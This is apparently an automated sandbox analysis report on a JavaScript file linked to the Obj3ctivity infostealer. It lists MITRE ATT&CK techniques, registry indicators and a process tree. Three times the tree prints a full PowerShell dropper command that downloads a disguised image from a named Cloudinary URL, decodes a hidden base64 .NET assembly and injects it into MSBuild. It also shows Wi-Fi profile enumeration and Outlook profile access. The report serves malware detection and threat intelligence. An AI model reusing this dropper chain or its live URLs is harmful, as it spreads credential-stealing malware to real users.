obj3ctivity | hxxps://www[.]albuspsikoloji[.]com[.]tr/2025%20inquiry[.]js

Analysis

max time kernel
150s
max time network
144s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
04-02-2025 08:41

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.albuspsikoloji.com.tr/2025%20inquiry.js

Score

10^/10

obj3ctivity collection discovery execution persistence privilege_escalation stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://res.cloudinary.com/daxwua63y/image/upload/v1738334533/alcb4htolzvfhzzufqh5.jpg

exe.dropper

https://res.cloudinary.com/daxwua63y/image/upload/v1738334533/alcb4htolzvfhzzufqh5.jpg

Signatures

Detects Obj3ctivity Stage1 1 IoCs

Obj3ctivity aka PXRECVOWEIWOEI is an infostealer written in C#.

stealer

resource	yara_rule
behavioral1/memory/2528-147-0x0000000000400000-0x00000000004E6000-memory.dmp	family_obj3ctivity

Obj3ctivity family
obj3ctivity
Obj3ctivity, PXRECVOWEIWOEI
Obj3ctivity aka PXRECVOWEIWOEI is an infostealer written in C#.
stealer obj3ctivity

Blocklisted process makes network request 8 IoCs

flow	pid	Process
50	3760	WScript.exe
52	3760	WScript.exe
60	3156	powershell.exe
62	3156	powershell.exe
64	316	powershell.exe
65	316	powershell.exe
94	4092	powershell.exe
95	4092	powershell.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3156	powershell.exe
316	powershell.exe
4092	powershell.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
66	icanhazip.com
82	ip-api.com

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 3156 set thread context of 2528	3156	powershell.exe	119
PID 316 set thread context of 636	316	powershell.exe	123
PID 4092 set thread context of 5056	4092	powershell.exe	137

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3752	cmd.exe
4376	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	MSBuild.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	MSBuild.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000_Classes\Local Settings	msedge.exe

NTFS ADS 1 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 116005.crdownload:SmartScreen	msedge.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

pid	Process
2592	msedge.exe
2592	msedge.exe
592	msedge.exe
592	msedge.exe
1088	identity_helper.exe
1088	identity_helper.exe
4620	msedge.exe
4620	msedge.exe
3156	powershell.exe
3156	powershell.exe
3156	powershell.exe
2528	MSBuild.exe
2528	MSBuild.exe
316	powershell.exe
316	powershell.exe
316	powershell.exe
2528	MSBuild.exe
2528	MSBuild.exe
4376	msedge.exe
4376	msedge.exe
4376	msedge.exe
4376	msedge.exe
4092	powershell.exe
4092	powershell.exe
4092	powershell.exe
5056	MSBuild.exe
5056	MSBuild.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs

pid	Process
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeDebugPrivilege	3156	powershell.exe
Token: SeDebugPrivilege	2528	MSBuild.exe
Token: SeDebugPrivilege	316	powershell.exe
Token: SeDebugPrivilege	636	MSBuild.exe
Token: SeSecurityPrivilege	2320	msiexec.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeDebugPrivilege	5056	MSBuild.exe

Suspicious use of FindShellTrayWindow 35 IoCs

pid	Process
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe
592	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 592 wrote to memory of 1832	592	msedge.exe	82
PID 592 wrote to memory of 1832	592	msedge.exe	82
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 3068	592	msedge.exe	83
PID 592 wrote to memory of 2592	592	msedge.exe	84
PID 592 wrote to memory of 2592	592	msedge.exe	84
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85
PID 592 wrote to memory of 3876	592	msedge.exe	85

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	MSBuild.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://www.albuspsikoloji.com.tr/2025%20inquiry.js
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb42b946f8,0x7ffb42b94708,0x7ffb42b94718
  2⤵
  PID:1832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2
  2⤵
  PID:3068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2592
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2936 /prefetch:8
  2⤵
  PID:3876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
  2⤵
  PID:4976
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
  2⤵
  PID:2268
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5012 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4760 /prefetch:1
  2⤵
  PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3892 /prefetch:1
  2⤵
  PID:324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5192 /prefetch:1
  2⤵
  PID:3116
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4700 /prefetch:1
  2⤵
  PID:3424
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5644 /prefetch:8
  2⤵
  PID:2892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5772 /prefetch:1
  2⤵
  PID:1384
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2688 /prefetch:1
  2⤵
  PID:2264
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5832 /prefetch:1
  2⤵
  PID:892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4620
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\2025 inquiry.js"
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  PID:3760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$originalText = '#x#.ep/r#.moc.ijolokispsubla.www//:sp##h';$restoredText = $originalText -replace '#', 't';$imageUrl = 'https://res.cloudinary.com/daxwua63y/image/upload/v1738334533/alcb4htolzvfhzzufqh5.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = [ClassLibrary1.Home].GetMethod('main').Invoke($null, [object[]] @($restoredText,'false','MSBuild','false'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3156
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      Accesses Microsoft Outlook profiles
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:2528
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        5⤵
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3752
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1556
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        6⤵
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:4376
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:60
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\2025 inquiry.js"
  2⤵
  - Checks computer location settings
  PID:2892
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$originalText = '#x#.ep/r#.moc.ijolokispsubla.www//:sp##h';$restoredText = $originalText -replace '#', 't';$imageUrl = 'https://res.cloudinary.com/daxwua63y/image/upload/v1738334533/alcb4htolzvfhzzufqh5.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = [ClassLibrary1.Home].GetMethod('main').Invoke($null, [object[]] @($restoredText,'false','MSBuild','false'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:316
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,12055670634467469169,6059527602038311374,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1732 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4376

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1988

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:432

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3660

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2320

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\2025 inquiry.js
1⤵
PID:4504

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\2025 inquiry.js"
1⤵
- Checks computer location settings
PID:432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "$originalText = '#x#.ep/r#.moc.ijolokispsubla.www//:sp##h';$restoredText = $originalText -replace '#', 't';$imageUrl = 'https://res.cloudinary.com/daxwua63y/image/upload/v1738334533/alcb4htolzvfhzzufqh5.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = [ClassLibrary1.Home].GetMethod('main').Invoke($null, [object[]] @($restoredText,'false','MSBuild','false'))"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4092
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5056

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Credential Access

Discovery

